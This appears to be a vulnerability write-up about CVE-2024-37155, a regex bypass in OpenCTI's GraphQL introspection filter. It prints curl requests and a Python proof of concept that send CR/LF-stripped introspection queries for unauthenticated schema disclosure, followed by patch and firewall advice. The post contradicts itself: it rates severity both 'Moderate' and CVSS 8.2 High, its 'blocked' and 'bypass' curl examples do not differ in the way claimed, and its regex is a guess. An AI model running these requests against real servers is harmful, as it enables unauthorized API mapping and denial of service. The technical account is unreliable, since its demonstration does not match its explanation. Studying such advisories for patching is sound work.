Listen to this Post
How CVE-2024-37155 Works
OpenCTI is an open-source platform for managing cyber threat intelligence knowledge and observables. To secure its GraphQL API, OpenCTI implements a `secureIntrospectionPlugin` that validates incoming queries. This plugin uses a regular expression (regex) to detect and block GraphQL Introspection queries — a feature that allows clients to query the schema for available types, fields, and operations.
The vulnerability, present in all versions prior to 6.1.9, exists because the regex validation logic can be trivially bypassed. The plugin’s regex pattern fails to account for specific whitespace characters — namely carriage return (\r) and line feed (\n) characters. By simply removing these characters from an Introspection query, an unauthenticated attacker can evade the security control entirely.
For example, running a `curl` command with a standard Introspection query against a vulnerable instance returns only a limited error message because the query is blocked. However, when the same Introspection query is submitted without the `\r\n` sequences, the plugin fails to match the regex pattern, and the server processes the query successfully. This allows the attacker to retrieve the full GraphQL schema, exposing every query, mutation, subscription, type, and field available on the endpoint.
Armed with this schema information, an attacker gains deep insight into the API’s attack surface, including which mutations can be used to create, update, or delete data, and which queries can be used to read sensitive information. Furthermore, Introspection queries are computationally expensive; repeatedly sending them can lead to resource exhaustion, effectively causing a Denial of Service (DoS). The issue is addressed in OpenCTI version 6.1.9, which patches the regex validation.
DailyCVE Form
| Field | Value |
| : | : |
| Platform | OpenCTI-Platform |
| Version | < 6.1.9 |
| Vulnerability | Introspection Bypass |
| Severity | Moderate |
| Date | 2024-11-18 |
| Prediction | Already Patched |
What Undercode Say: Analytics
The vulnerability stems from improper input sanitization in the secureIntrospectionPlugin. The regex pattern fails to account for `\r` and \n, allowing attackers to craft payloads that bypass validation. The following technical analysis demonstrates the exploitation:
Vulnerable Regex Logic (Conceptual):
// The plugin likely uses a pattern similar to: const introspectionPattern = /(\s__schema\s|\s__type\s)/; // This fails to match strings like "__schema" when whitespace is stripped or when \r\n is removed.
Curl Command – Blocked Request (Limited Error):
curl -X POST http://localhost:8080/graphql \
-H "Content-Type: application/json" \
-d '{"query":"query { __schema { types { name } } }"}'
Response: Limited error message (query blocked)
Curl Command – Bypass Request (Full Introspection):
Removing \r\n characters allows the query to pass the regex check
curl -X POST http://localhost:8080/graphql \
-H "Content-Type: application/json" \
-d '{"query":"query { __schema { types { name fields { name } } } }"}'
Response: Full GraphQL schema disclosure
Python Proof of Concept:
import requests
url = "http://localhost:8080/graphql"
introspection_query = """
query {
__schema {
types {
name
fields {
name
type {
name
kind
}
}
}
}
}
"""
The plugin's regex is bypassed by removing \r and \n
payload = {"query": introspection_query.replace("\n", "").replace("\r", "")}
response = requests.post(url, json=payload)
print(response.json())
Exploit
An unauthenticated attacker can exploit this vulnerability by sending a crafted GraphQL Introspection query that omits all carriage return (\r) and line feed (\n) characters. The secureIntrospectionPlugin‘s regex pattern fails to detect the sanitized query, allowing the server to process it and return the complete GraphQL schema. This schema reveals all available queries, mutations, subscriptions, types, and fields, effectively mapping the entire API attack surface. Attackers can then use this information to craft unauthorized queries or mutations to read or modify data. Additionally, repeated Introspection queries can overwhelm the server, leading to a Denial of Service (DoS) condition.
Protection
Upgrade: The primary and most effective mitigation is to upgrade to OpenCTI version 6.1.9 or later, which includes a patch that corrects the regex validation.
Workaround (if upgrade is not immediately possible):
- Implement a Web Application Firewall (WAF) or reverse proxy rule to block requests containing GraphQL Introspection keywords (e.g.,
__schema,__type) before they reach the OpenCTI application. - Restrict network access to the GraphQL endpoint, allowing only trusted IP addresses or internal networks.
- Monitor logs for unusual or repeated Introspection queries and block offending IP addresses.
Impact
- Information Disclosure: Attackers can retrieve the entire GraphQL schema without authentication, exposing all available operations and data structures.
- Unauthorized Data Access: With schema knowledge, attackers can craft queries to read sensitive information they are not authorized to access.
- Denial of Service (DoS): Introspection queries are resource-intensive; repeated exploitation can exhaust server resources and cause service disruption.
- CVSS Score: 8.2 (High) – Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
